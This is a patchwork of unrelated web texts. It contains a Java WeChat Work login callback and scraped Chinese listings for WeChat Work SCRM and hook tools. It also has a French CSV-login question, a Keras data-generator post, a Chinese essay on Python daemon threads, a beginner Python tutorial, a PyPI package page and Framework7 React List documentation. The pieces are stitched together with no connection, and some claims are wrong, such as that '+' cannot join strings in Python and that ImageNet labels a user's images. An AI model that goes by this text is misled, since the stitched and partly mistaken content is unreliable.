/**
* auth平台中配置的授权回调地址
* 以本项目为例,在创建"企业微信"授权应用时的回调地址应为:http://127.0.0.1:8443/auth/callback/wechat_enterprise?callback=
* 企业微信免登陆
* 获取企业用户信息 关联子系统用户 实现免登
* @param request
* @param source 请求来源:WECHAT_ENTERPRISE:企业微信
* @return
* @throws Exception
*/
@RequestMapping("callback/{source}")
public Object login(HttpServletRequest request, @PathVariable("source") String source) throws Exception{
//获取请求参数
Map<String, String[]> parameterMap = request.getParameterMap();
System.out.println(JSONUtil.parse(parameterMap).toStringPretty());
if(StrUtil.isBlank(source)){
return "error";
}
switch (SourceInfoEnum.valueOf(source)){
// 企业微信
case WECHAT_ENTERPRISE:
String code = parameterMap.get("code")[0];
//获取微信服务
WxCpService wxCpService = WxCpPrivateConfiguration.getCpService(1000001);
//获取用户ID
WxCpOauth2UserInfo userInfo = wxCpService.getOauth2Service().getUserInfo(code);
System.out.println(JSONUtil.parse(userInfo).toStringPretty());
//获取通讯录
// List<WxCpDepart> list = wxCpService.getDepartmentService().list(1L);
// for (WxCpDepart wxCpDepart : list) {
// List<WxCpUser> wxCpUsers = wxCpService.getUserService().listByDepartment(wxCpDepart.getId(), false, 0);
// System.out.println(JSONUtil.parse(wxCpDepart).toStringPretty());
// System.out.println(JSONUtil.parse(wxCpUsers).toStringPretty());
// }
//获取用户明细信息
WxCpUser byId = wxCpService.getUserService().getById(userInfo.getUserId());
System.out.println(byId);
//判断子系统是否存在该用户, 存在则直接免登, 生成 token 存入session / redis
//不存在则创建用户
break;
default:
break;
}
return "ok";
}
}
2020-10-21 14:17:25企业微信SCRM系统部署_企业微信SCRM二次开发_企业微信SCRM系统独立版源码价格企业微信SCRM系统部署_企业微信SCRM二次开发_企业微信SCRM系统独立版源码价格 点趣互动是企业微信系统的第三方应用提供厂商,用于管理员工企业微信的内一款系统软件。点趣互动企业微信scrm软件主要有以下三大功能:...
企业微信SCRM系统部署_企业微信SCRM二次开发_企业微信SCRM系统独立版源码价格
点趣互动是企业微信系统的第三方应用提供厂商,用于管理员工企业微信的内一款系统软件。点趣互动企业微信scrm软件主要有以下三大功能:
1、企业微信会话内容存档:点趣互动企业微信scrm系统可以长久留存员工企业微信上的会话信息,其中包括文字、语音、图片等等。而且在企业微信点趣互动软件后台,老板可以随时随地查看聊天内容。
2、企业微信风险预警:开通企业微信scrm软件系统之后,可以在后台设置敏感词或者敏感操作,如果公司员工利用企业微信做出违规行为,点趣互动SCRM就会立刻发出预警,规避风险。
3、企业微信客户管理:点趣互动SCRM可以管理员工企业微信上的客户信息,一旦员工私下添加客户到个人微信或者转发客户名片给其他人,点趣互动SCRM系统就会标记这个操作,避免客户资源流失。
点趣企业微信SCRM系统支持独立部署、系统源码买断等合作。
2020-12-14 15:58:29企业微信api,企业微信sdk接口企业微信api,企业微信sdk接口 1、企业微信SDK接口API调用-企业微信好友收发消息 /** * 给企业微信好友发消息 * @author wechat:happybabby110 * @blog http://www.wlkankan.cn */ @Async public void ...
2020-12-15 11:00:00企业微信api接口调用-触发推送企业微信微信好友企业微信SDK接口API调用-触发推送企业微信微信好友 /** * 触发企业微信推送微信好友列表 * @author wechat:happybabby110 * @blog http://www.wlkankan.cn */ @Async public void handleMsg...
2020-08-25 12:47:46企业微信HOOK和企业微信PC企业微信pc hook qq: 784615627
集成
2020-10-10 14:31:28企业微信,给企业微信用户发消息1.企业微信申请企业微信官方地址:https://work.weixin.qq.com/ 2.企业微信给用户发消息 申请企业微信以后,我们可以用管理员登录企业微信后台。 2.1.登录企业微信后台管理 2.2.创建应用 在应用管理模块,创建一...
集成
2019-02-21 10:58:37企业微信,企业微信扫码登录和企业微信容器内免密登录项目上为了支持新的业务,扩展了通过企业微信扫码登录和通过企业微信容器内的直接访问应用服务的免密登录。 1.扫码登录企业微信以Userid作为企业内的用户身份唯一标识,集成接口可以参考官网文档: ...
基于
2019-08-12 02:30:44企业微信微信企业号的生日管家前端基于企业微信/微信企业号的生日管家 - 前端
2020-12-14 15:31:42企业微信sdk,企业微信api接口企业微信SDK接口API调用-企业微信好友收发消息 /** * 给企业微信好友发消息 * @author wechat:happybabby110 * @blog http://www.wlkankan.cn */ @Async public void handleMsg(ChannelHandlerContext ctx, ...
2020-12-11 16:55:49企业微信SDK接口API调用-触发推送企业微信微信好友企业微信SDK接口API调用-触发推送企业微信微信好友 /** * 触发企业微信推送微信好友列表 * @author wechat:happybabby110 * @blog http://www.wlkankan.cn */ @Async public void handleMsg...
2020-08-07 14:29:20企业微信开发概述篇1,了解企业微信开发是怎么回事,企业微信开发是开发什么,怎么接入企业微信,接入企业微信能获取什么能力? 2,了解企业微信api及应用类别,自建内部应用与第三方应用有什么区别,适用场景是什么,我该怎么选应用...
python
2020-12-29 07:08:42企业微信机器人_企业微信机器人的快捷制作企业微信更新了企业微信群机器人功能,把制作过程跟大家分享一下,文末再给大家介绍一个神器!1、首先创建一个企业微信群机器人,需要选择一个群才可以添加企业微信机器人制作流程2、通过webhook调用地址发消息(具体...
2019-08-07 09:22:05企业微信-拉取企业微信聊天记录1,企业微信开通了会话内容存档 2,程序运行环境windows平台,VS2017,c++ 3,你是企业微信的管理员 二,准备工作 1,获取RSA公私钥对,推荐用http://web.chacuo.net/netrsakeypair这个网址生成。 ...
2020-06-04 18:06:50企业微信三方开发:注册企业微信服务商成为企业微信服务商 注册企业微信要成为服务商之前,首先贵公司要注册了企业微信,注册路径如下: https://work.weixin.qq.com/?from=openApi 按步骤填入基础信息注册就行了。 申请成为服务商 服务商入口: ...
微信和
2020-09-30 18:46:18企业微信windows电脑中应用多开微信和企业微信windows电脑中应用多开,微信和企业微信windows电脑中应用多开,微信和企业微信windows电脑中应用多开
PC
2020-08-31 15:01:08企业微信hook接口,企业微信机器人介绍 wxwork_pc_api 使用HOOK技术将核心功能封装成dll,并提供简易的接口给支持调用dll的语言使用。 你可以通过扩展 wxwork_...目前支持的企业微信PC版本是3.0.14.1205, 使用api前,先这里下载并安装WXWork_3.0.14.1205
2018-10-02 17:11:49企业微信开发企业微信开发Demo
delphi
2021-01-07 19:51:24企业微信消息机器人_企业微信机器人的快捷制作企业微信更新了企业微信群机器人功能,把制作过程跟大家分享一下,文末再给大家介绍一个神器!1、首先创建一个企业微信群机器人,需要选择一个群才可以添加企业微信机器人制作流程2、通过webhook调用地址发消息...
电脑版
2020-11-07 22:27:28企业微信_企业微信,再造一个商业流量版的微信?“当企业微信延伸到企业外部的时候,会产生更大的价值。”这是张小龙在2019年微信公开课Pro上,谈及企业微信时提出的理念。微信虽不是每个产品创新都能获得成功,但其背后的产品理念往往有领先全行业的地方。12月23...
微信及
2020-08-13 15:47:28企业微信内嵌浏览器内核信息及H5跑分数据-企业微信开发在我最近的视频系列《企业微信开发概述篇》(课程章节及链接请在文章最下方获取)有提到过微信和企业微信支持H5网页应用,是因为微信和企业微信内嵌定制浏览器; 今天顺便和大家分享下浏览器相关的知识;后面再...
2020-12-15 10:59:00企业微信api接口调用-企业微信好友收发消息企业微信api消息接口调用-企业微信好友收发消息 /** * 给企业微信好友发消息 * @author wechat:happybabby110 * @blog http://www.wlkankan.cn */ @Async public void handleMsg(ChannelHandlerContext ctx, ...
cas server 踢人功能_
2020-12-22 05:10:49企业微信营销机器人怎么添加?企业微信群机器人可以自动踢人吗? |企业微信指南...使用企业微信营销时,我们可以使用企业微信自带的社群机器人帮助我们运营客户,那么社群机器人该如何添加呢?企业微信机器人可以自动踢人吗?下面我们一起来看看吧~企业微信机器人怎么用企业微信营销机器人对应的是...
2018-04-21 15:32:10企业微信开发(1)——接入企业微信首先得注册个企业微信其次下载一个加解密的包,免得自己封装 https://work.weixin.qq.com/api/doc#10128/java%E5%BA%93 具体使用方法:下载解压后,将com文件夹拷贝到src下,然后将lib下的jar包拷贝到咱们web...
2020-08-27 10:00:13企业微信任务宝,企业微信裂变拉新打造私域流量!什么是企业微信任务宝? 顾名思义是企业微信版的任务宝(又名海报通),通过活动奖品吸引用户参与,用户参与活动生成自己的专属推广海报和活动文案,引导用户分享海报邀请好友扫码关注公众号+添加企业微信,完成邀请...
微信企业号与
2016-08-22 12:31:52企业微信微信企业号和企业微信有什么区别吗?如何申请微信企业号?如何申请企业微信?干货,拿走不谢1、微信企业号和企业微信有什么区别吗?微信企业号是移动办公互联网化的便捷办公方式。企业号链接上下游合作伙伴,是链接...
2018-10-24 10:06:04企业微信与个人微信实现消息互通,用企业微信连接10亿客户企业微信是免费使用的,是腾讯2016年推出的战略级产品,是一款对内也可以对外沟通的即时通讯和办公软件。企业微信与个人微信实现消息互通,用企业微信连接10亿客户,让工作更高效,让聊天更愉悦!企业微信继承了...
Java
2019-07-30 16:27:07企业微信开发-企业微信所有类型消息推送封装企业微信开发第一步获取AccessToken,企业微信的AccessToken和公众号的不一样,企业微信所有接口调用只需要一个AccessToken,而公众号授权和jssdk是分开的 一、获取企业微信AccessToken import ...
空空如也
空空如也
|
J'ai un fichier CSV contenant des informations et le code parcourt chaque ligne du fichier CSV, et si le nom d'utilisateur saisi correspond à la valeur de la ligne, il permettra à l'utilisateur de se connecter.Python - Message d'impression à la fin de l'itération d'un fichier CSV
Cependant, je ne suis pas sûr comment autoriser mon programme à dire quand leurs détails ne sont pas corrects. Le "non trouvé" s'imprime après chaque itération plutôt qu'à la fin du fichier CSV.
Comment est-ce que je peux faire en sorte que, une fois à la fin de la boucle for, il indique que les détails ne sont pas trouvés?
Merci.
username = str(input("Enter your username: "))
password = str(input("Enter your password: "))
file = open("details.csv","r")
print('Details opened')
contents = csv.reader(file)
print('reader established')
for row in contents:
print('begin loop')
if username == row[4]:
print("Username found")
if password == row[3]:
print("Password found")
main()
else:
print("not found")
|
Good organization is key when it comes to the performance of our engineering team. When it comes to training and validation of an ML algorithm, there are some best practices. Using the ImageDataGenerator class from Keras gives us an easy way to organize a dataset. Maintaining this from the in-house tagging we have, to CI/CD, and through release giving us a shorter release cycle with fewer bugs. ImageNet will automatically label these images for us removing a coding step.
File Structure
Firstly, start by understanding the file structure. The root directory /images, as an example, could be a Kaggle file you have unzipped with the images you want to train on.
Training Image Generator
The image generator can perform some manipulations on the fly; this makes it handy to play around with some alternative options without preprocessing an entire training set. Here, we will normalize via rescale and change the dimensions via target_size.
from tensorflow.keras.preprocessing.image import ImageDataGenerator train_datagen = ImageDataGenerator(rescale=1.0/255) training_dir = '/tmp/images' train_generator = train_datagen.flow_from_directory( training_dir, target_size=(120, 120), batch_size=20, class_mode='binary' )
Validation Image Generator
Similarly to the aforementioned training generator, we can create a generator for our validation set
test_datagen = ImageDataGenerator(rescale=1.0/255) validation_generator = test_datagen.flow_from_directory( validation_dir, target_size=(120, 120), batch_size=20, class_mode='binary' )
And go ahead and train like usual, but using the generators instead
model.fit(train_generator, validation_data=validation_generator, steps_per_epoch=100, epochs=15, validation_steps=50, verbose=2 )
|
"daemon thread" 是一个困扰了我很久的概念。官方文档是这么说的:
A thread can be flagged as a “daemon thread”. The significance of this flag is that the entire Python program exits when only daemon threads are left.
然而文档并没有解释这个概念是怎么来的。比如,为什么我在操作系统课上没听过呢?下面是一番搜索之后的结果。
历史
Daemon(守护进程)
daemon,或者 daemon process,在计算机领域里一般指一种在后台执行的程序。这里有一个简单明了的解释:
"Daemon (Daemon Process)" is a notion in UNIX denoting a process detached from any controlling terminal, typically waiting for some event to occur and to respond to in some way. Windows services are similar but I assume Bil et alia chose deliberately a different word for them.
常见的守护进程就是 Linux 里的那一堆 “xxxd” 程序。下文中为避免歧义,称这里的 daemon 为守护进程。
daemon thread 和守护进程没什么卵关系
是的,他们主要的共同点就是都包含单词“daemon”。但非要说一点联系没有也是不对的。一般而言,被 flag 为 daemon 的线程需要长期在后台执行(比如发送心跳包、检查未读消息等),并且不需和用户直接交互,和守护进程类似。
Python 中的 daemon thread 来自 Java
Google “daemon thread”,第一页全是 Java。我觉得很奇怪,于是找到了 threading.py 的第一次 commit,前两行赫然写着:
# threading.py:# Proposed new threading module, emulating a subset of Java's threading model
当初看 concurrent.futures 源码的时候我还在想“直接照搬 Java 的 API 真的好么”,没想到 Guido 居然在 98 年就叛变革命了……
Java 文档如是说:
Every thread has a priority. Threads with higher priority are executed in preference to threads with lower priority. Each thread may or may not also be marked as a
daemon. When code running in some thread creates a new Thread object, the new thread has its priority initially set equal to the priority of the creating thread, and is adaemonthread if and only if the creating thread is adaemon.
When a Java Virtual Machine starts up, there is usually a single non-daemon thread (which typically calls the method named main of some designated class). The Java Virtual Machine continues to execute threads until either of the following occurs:
* The exit method of class Runtime has been called and the security manager has permitted the exit operation to take place. * All threads that are notdaemonthreads have died, either by returning from the call to the run method or by throwing an exception that propagates beyond the run method.
嗯,基本一个意思。
应用
Daemon thread 的特性很容易验证,不细说。
import threading
import os
import time
def func():
time.sleep(5)
print("finish")
threading.Thread(target=func).start()
threading.Thread(target=func, daemon=True).start()
print("aaa")
更有意义的问题是,为什么 Java/Python 要引入 daemon thread,有什么用处?好在已经有人解释过了:
Some threads do background tasks, like sending keepalive packets, or performing periodic garbage collection, or whatever. These are only useful when the main program is running, and it's okay to kill them off once the other, non-daemon, threads have exited.
Without daemon threads, you'd have to keep track of them, and tell them to exit, before your program can completely quit. By setting them as daemon threads, you can let them run and forget about them, and when your program quits, any daemon threads are killed automatically.
简单来说就是,本来并没有 daemon thread,为了简化程序员的工作,让他们不用去记录和管理那些后台线程,创造了一个 daemon thread 的概念。这个概念唯一的作用就是,当你把一个线程设置为 daemon,它会随主线程的退出而退出。关键点有三个:
background task
only useful when the main program is running
ok to kill
被设置为 daemon 的线程应当满足这三条。第一点需要说一下,比如一个线程需要用 join 执行,那么 daemon 就没有意义了,因为程序总是需要等待它完成才能继续执行。
Daemon process
前面说到 Python 里的 daemon 概念抄自 Java,但 Guido 并未止步于此,他把 daemon 的概念推广到了多进程。当用 multiprocessing 创建新的进程时,也可以设置 daemon 属性。
Python 中有很多创建新进程的方法,并非都可以设置为 daemon process。下面列举一些:
multiprocessing.Process:可以设置 daemon
os.system:不可设置 daemon,因为该命令会阻塞当前程序的执行,不满足“background task”
subprocess.Popen:不可设置 daemon,因为 Popen 打开的是外部程序,不满足“only useful when the main program is running”
concurrent.futures.ProcessPoolExecutor:worker process 默认是 daemon
Daemon thread 的实现
最后来看一下 daemon thread 的实现,其实很简单。使用最初始(第一次commit)的 threading.py 来分析。
_sys.exitfunc = self.__exitfunc
_sys 就是 sys,sys.exitfunc 已经被 atexit 替代,作用都是在程序退出的时候执行清理操作。那么 __exitfunc 是什么呢?
def __exitfunc(self):
self._Thread__stop()
t = _pickSomeNonDaemonThread()
if t:
if __debug__:
self._note("%s: waiting for other threads", self)
while t:
t.join()
t = _pickSomeNonDaemonThread()
if self.__oldexitfunc:
if __debug__:
self._note("%s: calling exit handler", self)
self.__oldexitfunc()
if __debug__:
self._note("%s: exiting", self)
self._Thread__delete()
首先调用基类 Thread 中的 __stop 函数。下面是关键:
首先,t = _pickSomeNonDaemonThread()顾名思义返回一个 non-daemon 线程。_pickSomeNonDaemonThread其实就是遍历两个保存了已创建和创建中线程的字典,并检查其 daemon 属性,如果是 non-daemon 则返回。
这三句是个人都知道在干嘛吧
while t:
t.join()
t = _pickSomeNonDaemonThread()
于是所有 non-daemon threads 都执行完了,主线程退出。
|
A Python Tutorial, the Basics
ð A very easy Python Tutorial! ð
#Tutorial Jam
@elipie's jam p i n g
p i n g
Here is a basic tutorial for Python, for beginners!
Table of Contents:
1. The developer of python
2. Comments/Hashtags
3. Print and input statements
f' strings
4. If, Elif, Else statements
5. Common Modules
1. Developer of Python
It was created in the late 1980s by Guido van Rossum in the Netherlands. It was made as a successor to the ABC language, capable interfacing with the Ameoba operating system. It's name is python because when he was thinking about Python, he was also reading, 'Monty Python's Flying Circus'. Guido van Rossum thought that the langauge would need a short, unique name, so he chose Python.
For more about Guido van Rossum, click here
2. Comments/Hastags
Comments are side notes you can write in python. They can be used, as I said before:
sidenotes
instructions or steps
etc.
How to write comments:
#This is a comment
The output is nothing because:
It is a comment and comments are invisible to the computer
Comments are not printed in Python
So just to make sure, hastags are used to make comments. And remember, comments are ignored by the computer.
3. Print and Input statements
1. Print Statements
Print statements, printed as print, are statements used to print sentences or words. So for example:
print("Hello World!")
The output would be:
Hello World!
So you can see that the print statement is used to print words or sentences.
2. Input Statements
Input statements, printed as input, are statements used to 'ask'. For example:
input("What is your name?")
The output would be:
What is your name?
However, with inputs, you can write in them. You can also 'name' the input. Like this:
name = input("What is your name?")
You could respond by doing this:
What is your name? JBYT27
So pretty much, inputs are used to make a value that you can make later.
Then you could add a if statement, but lets discuss that later.
3. f strings
f strings, printed as f(before a qoutation), is used to print or input a value already used. So what I mean is, say I put an f string on a print statement. Like this:
print(f"")
The output right now, is nothing. You didn't print anything. But say you add this:
print(f"Hello {name}!")
It would work, only if the name was named. In other words, say you had a input before and you did this to it:
name = input()
Then the f string would work. Say for the input, you put in your name. Then when the print statement would print:
Hello (whatever your name was)!
Another way you could do this is with commas. This won't use an f string either. They are also simaler. So how you would print it is like this:
name = input()
...
print("Hello ", name, "!")
The output would be the same as well! The commas seperate the 2 strings and they add the name inside. But JBYT27, why not a plus sign? Well, this question you would have to ask Guido van Rossum, but I guess I can answer it a bit. It's really the python syntax. The syntax was made that so when you did a plus sign, not a comma, it would give you an error.
Really, the only time you would use this is to give back your name, or to find if one value was equal to each other, which we'll learn in a sec.
4. If, Elif, Else Statements
1. If Statements
If statements, printed as if, are literally as they are called, if sentences. They see if a sentence equals or is something to an object, it creates an effect. You could think an if statement as a cause and effect. An example of a if statement is:
name = input("What is your name?")
#asking for name
if name == "JBYT27":
print("Hello Administrator!")
The output could be:
What is your name? JBYT27Hello Administrator!
However, say it isn't JBYT27. This is where the else, elif, try, and except statements comes in!
2. Elif Statements
Elif statements, printed as elif are pretty much if statements. It's just that the word else and if are combined. So say you wanted to add more if statements. Then you would do this:
if name == "JBYT27":
print("Hello Administrator!")
elif name == "Code":
print("Hello Code!")
It's just adding more if statements, just adding a else to it!
3. Else Statements
Else statments, printed as else, are like if and elif statements. They are used to tell the computer that if something is not that and it's not that, go to this other result. You can use it like this (following up from the other upper code):
if name == "JBYT27":
print("Hello admin!")
elif name == "Squid":
print("Hello Lord Squod!")
else:
print(f"Hello {name}!")
5. Common Modules
Common modules include:
os
time
math
sys
replit
turtle
tkinter
random
etc.
So all these modules that I listed, i'll tell you how to use, step by step! ;) But wait, what are modules?
Modules are like packages that are pre-installed in python. You just have to fully install it, which is the module(please correct me if im wrong). So like this code:
import os
...
When you do this, you successfully import the os module! But wait, what can you do with it? The most common way people use the os module is to clear the page. By means, it clears the console(the black part) so it makes your screen clear-er. But, since there are many, many, many modules, you can also clear the screen using the replit module. The code is like this:
import replit
...
replit.clear()
But one amazing thing about this importing is you can make things specific. Like say you only want to import pi and sqrt from the math package. This is the code:
from math import pi, sqrt
Let me mention that when you do this, never, ever add an and. Like from ... import ... and .... That is just horrible and stupid and... Just don't do it :)
Next is the time module
You can use the time module for:
time delay
scroll text
And yeah, that's pretty much it (i think)
Note:
All of the import syntax is the same except for the names
Next is tkinter, turtle
You can use the tkinter module for GUI's (screen playing), you can import it in a normal python, or you can do this in a new repl.
You can use the turtle for drawing, it isn't used much for web developing though.
The math and sys
The math is used for math calculations, to calculate math. The sys is used for accessing used variables. I don't really know how I could explain it to you, but for more, click here
Random
The random module is used for randomizing variables and strings. Say you wanted to randomize a list. Here would be the code:
import random
...
a_list = ["JBYT27","pie","cat","dog"]
...
random.choice(a_list)
The output would be a random choice from the variable/list. So it could be pie, JBYT27, cat, or dog. From the random module, there are many things you can import, but the most common are:
choice
randrange
etc.
And that's all for modules. If you want links, click below.
Links for modules:
And that's it!
Hooray! We made it through without sleeping!
Credits to:
Many coders for tutorials
Books and websites
replit
etc.
Links:
Web links:
ranging from a few days or hoursifyoulikereading
Video links:
ranging from 1-12 hoursifyoudon'tlike reading
Otherwise:
ranging from 5 hours-a few daysreplittutorial links
I hope you enjoyed this tutorial! I'll cya on the next post!
stay safe!
You are viewing a single comment. View All
|
We're a place where coders share, stay up-to-date and grow their careers.
Awesome tutorial, many thanks.But I have one doubt, can you help me?
self.z2_error = self.o_delta.dot(self.W2.T) # z2 error: how much our hidden layer weights contributed to output error self.z2_delta = self.z2_error*self.sigmoidPrime(self.z2) # applying derivative of sigmoid to z2 error self.W1 += X.T.dot(self.z2_delta) # adjusting first set (input --> hidden) weights self.W2 += self.z2.T.dot(self.o_delta) # adjusting second set (hidden --> output) weights
what means those T's? self.w2.T, self.z2.T etc...
T is to transpose matrix in numpy.docs.scipy.org/doc/numpy-1.14.0/re...
We're a place where coders share, stay up-to-date and grow their careers.
|
Python library to capture screenshots of web applications or pages
Project description
Screamshot
Python library to capture screenshots of web applications
Good practices
Any code addition must be done in your own branch. You can name it fl/what_this_branch_bringswhere 'f' is the first letter of your first name and 'l' the first letter of your last name.
A branch resolves a specific issue.
Please write exhaustive tests. The coverage must not decrease.
Please merge the master branch into yours, run the tests and checks and correct all errors and warnings before pushing your code.
When you think you have finished you can make a pull request.
Testing and checks
To start the tests and checks
The first time
Install dockeranddocker-compose.
Run: docker-compose build, to create all the required images.
To start the verification, run: docker-compose up.
When it is already setup
You just need to run docker-compose up.
To clean up
If you want to stop containers and remove containers, networks, volumes, and images created by up command, run: docker-compose down.
If you want to delete all the images, run: docker rmi -f $(docker images -q).
To write new tests
You must use the unittestpackage
You must put your test file in the testsfolder
You must name your test file using the following next pattern: test_*.py
Local server
Usage
Documentation
The documentation is accessible here, on readthedocs.
Exemple with django
The server must be launched using --nothreading and --noreload as argument.
# views.py in a Django project
from django.http import HttpResponse
import asyncio
from screamshot import generate_bytes_img_prom
def home(request):
loop = asyncio.get_event_loop()
future = asyncio.Future()
asyncio.ensure_future(
generate_bytes_img_prom('https://www.google.fr', future))
loop.run_until_complete(future)
return HttpResponse(future.result(), content_type='image')
Or using the already wrapped function
# views.py in a Django project
from django.http import HttpResponse
from screamshot import generate_bytes_img__django_wrap
def home(request):
img = generate_bytes_img__django_wrap('https://www.google.fr')
return HttpResponse(img, content_type='image')
Using Gunicorn
With Gunicorn there isn't the thread related problems so we don't need to use the --nothreading and --noreload arguments.
CHANGELOG
0.0.1
Initialization of Screamshot library
initfile:
author
version
all
core file:
A ScreenShotobject with three methods:
load, loads a web page
screamshot, takes a screenshot of a loaded page
load_and_screamshot, loads a web page and takes a screenshot
A
0.1.0
There is no more ScreenShotobject just a function namedgenerate_bytes_imgwhich takes some parameters and returns a binarybytesobject.
0.1.1
generate_bytes_imgis no more a sync function andgenerate_bytes_img_promhas been added
generate_bytes_img_promuses theasyncio.Futureobject
0.1.2
A test and verification tool using Docker is now available
0.1.3
Add browser-managerscript
Add screamshotscript
0.1.4
Add serializefunction
Add deserializefunction
0.1.5
Add generate_bytes_img_django_wrapfunction
0.1.6
Module is now available
0.1.7
The browser endpoint is saved in the temporary directory
0.1.8
serializefunction returns adictobject
deserializetakes adictobject
0.1.9
Remove serializer functions
Add a bytes_to_img function
0.1.10
generate_bytes_img_django_wrapis renamedgenerate_bytes_img_wrap
Error are handled
0.1.11
bytes_to_pngis renamedbytes_to_file
bytes_to_filesupports type choice
0.1.12
You can now fetch http headers from another page with get_token
And store these headers in the local storage
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Filename, size File type Python version Upload date Hashes
Filename, size screamshot-0.1.12-py3-none-any.whl (19.7 kB) File type Wheel Python version py3 Upload date Hashes View
Filename, size screamshot-0.1.12.tar.gz (10.7 kB) File type Source Python version None Upload date Hashes View
Hashes for screamshot-0.1.12-py3-none-any.whl
Algorithm Hash digest
SHA256 b058803b2a2ba84211c0bada47638070e1e9738f07f1190867f96af0bf4c4b54
MD5 70f7cc913482e92a996d02b41f415e94
BLAKE2-256 20597f7bf2666b0f31a585af7df2e60e6c252cb6503e7a48366218d2c22e2013
|
List React Component
List views are versatile and powerful user interface compontents frequently found in iOS apps. A list view presents data in a scrollable list of multiple rows that may be divided into sections/groups.
List views have many purposes:
To let users navigate through hierarchically structured data
To present an indexed list of items
To display detail information and controls in visually distinct groupings
To present a selectable list of options
List React component represents Framework7's List View component.
List Components
There are following components included:
/List- main List View elementF7List
/ListGroup- list group elementF7ListGroup
List Properties
Prop Type Default Description
<List> properties
inset boolean false Makes list block inset
tabletInset boolean false Makes block inset on tablets, but not on phones
mediaList boolean false Enables Media List
linksList boolean false Enables simplified Links List
simpleList boolean false Enables simplified Simple List
sortable boolean false Enables Sortable List
sortableEnabled boolean false Enables sorting on sortable list
sortableMoveElements boolean When passed it will overwrite same `sortable.moveElements` global app parameter.
accordion boolean false Enables Accordion List
contactsList boolean false Enables Contacts List by adding required addional classes for styling
form boolean false Enables <form> tag on list block instead of <div>
formStoreData boolean false Enables form storage for the current form
inlineLabels boolean false Enables inline-styled labels for Form Inputs
noChevron boolean false Removes "chevron" icon on nested list item links
chevronCenter boolean false Sets "chevron" icon on nested media list items on center (vertically)
noHairlines boolean false Removes outer hairlines
noHairlinesMd boolean false Removes outer hairlines for MD theme
noHairlinesIos boolean false Removes outer hairlines for iOS theme
noHairlinesBetween boolean false Removes inner hairlines between items
noHairlinesBetweenMd boolean false Removes inner hairlines between items for MD theme
noHairlinesBetweenIos boolean false Removes inner hairlines between items for iOS theme
tab boolean false Adds additional "tab" class when block should be used as a Tab
tabActive boolean false Adds additional "tab-active" class when block used as a Tab and makes it active tab
virtualList boolean false Enables Virtual List
virtualListParams object Object with Virtual List Parameters
<ListGroup> properties
mediaList boolean false Enables Media List for this group
sortable boolean false Enables Sortable List for this group
simpleList boolean false Enables simplified Simple List for this group
List Events
Event Description
<List> events
tabShow Event will be triggered when List Block-Tab becomes visible/active
tabHide Event will be triggered when List Block-Tab becomes invisible/inactive
submit Event will be triggered on list-form submit when list used as form (with enabled form prop)
<List> Sortable specific events
sortableEnable Event will be triggered when sortable mode is enabled
sortableDisable Event will be triggered when sortable mode is disabled
sortableSort Event will be triggered after user release currently sorting element in new position. event.detail will contain object with from and to properties with start/new index numbers of sorted list item
<List> Virtual List specific events
virtualItemBeforeInsert Event will be triggered before item will be added to virtual document fragment
virtualItemsBeforeInsert Event will be triggered after current DOM list will be removed and before new document will be inserted
virtualItemsAfterInsert Event will be triggered after new document fragment with items inserted
virtualBeforeClear Event will be triggered before current DOM list will be removed and replaced with new document fragment
List Slots
List React component (<List>) has additional slots for custom elements:
- element will be inserted in the beginning of list view and right beforebefore-list<ul>main list
- element will be inserted in the end of list view and right afterafter-list<ul>main list
- element will be inserted inside oflist<ul>main list element
Virtual List
For Virtual List usage and examples check the Virtual List React Component documentation.
Sortable List
For Sortable List usage and examples check the Sortable React Component documentation.
Accordion List
For Accordion List usage and examples check the Accordion React Component documentation.
Examples
Simple List
<BlockTitle>Simple List</BlockTitle>
<List simple-list>
<ListItem title="Item 1"></ListItem>
<ListItem title="Item 2"></ListItem>
<ListItem title="Item 3"></ListItem>
</List>
Simple List Links
<BlockTitle>Simple Links List</BlockTitle><List> <ListItem title="Link 1" link="#"></ListItem> <ListItem title="Link 2" link="#"></ListItem> <ListItem title="Link 3" link="#"></ListItem></List>
Data list, with icons
<BlockTitle>Data list, with icons</BlockTitle>
<List>
<ListItem title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="John Doe" badge="5">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem title="Jenna Smith">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
</List>
Links
<BlockTitle>Links</BlockTitle>
<List>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="John Doe" after="Cleaner">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Jenna Smith">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
</List>
Links, Header, Footer
<BlockTitle>Links, Header, Footer</BlockTitle>
<List>
<ListItem link="#" header="Name" title="John Doe" after="Edit">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" header="Phone" title="+7 90 111-22-3344" after="Edit">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" header="Email" title="[email protected]" footer="Home" after="Edit">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" header="Email" title="[email protected]" footer="Work" after="Edit">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
</List>
Links, no icons
<BlockTitle>Links, no icons</BlockTitle><List> <ListItem link="#" title="Ivan Petrov"></ListItem> <ListItem link="#" title="John Doe"></ListItem> <ListItem divider title="Divider Here"></ListItem> <ListItem link="#" title="Ivan Petrov"></ListItem> <ListItem link="#" title="Jenna Smith"></ListItem></List>
Grouped with sticky titles
<BlockTitle>Grouped with sticky titles</BlockTitle><List> <ListGroup> <ListItem title="A" groupTitle></ListItem> <ListItem title="Aaron "></ListItem> <ListItem title="Abbie"></ListItem> <ListItem title="Adam"></ListItem> </ListGroup> <ListGroup> <ListItem title="B" groupTitle></ListItem> <ListItem title="Bailey"></ListItem> <ListItem title="Barclay"></ListItem> <ListItem title="Bartolo"></ListItem> </ListGroup> <ListGroup> <ListItem title="C" groupTitle></ListItem> <ListItem title="Caiden"></ListItem> <ListItem title="Calvin"></ListItem> <ListItem title="Candy"></ListItem> </ListGroup></List>
Mixed and nested
<BlockTitle>Mixed and nested</BlockTitle>
<List>
<ListItem link="#" title="Ivan Petrov" after="CEO">
<Icon slot="media" icon="demo-list-icon"></Icon>
</ListItem>
<ListItem link="#" title="Two icons here">
<Icon slot="media" icon="demo-list-icon"></Icon>
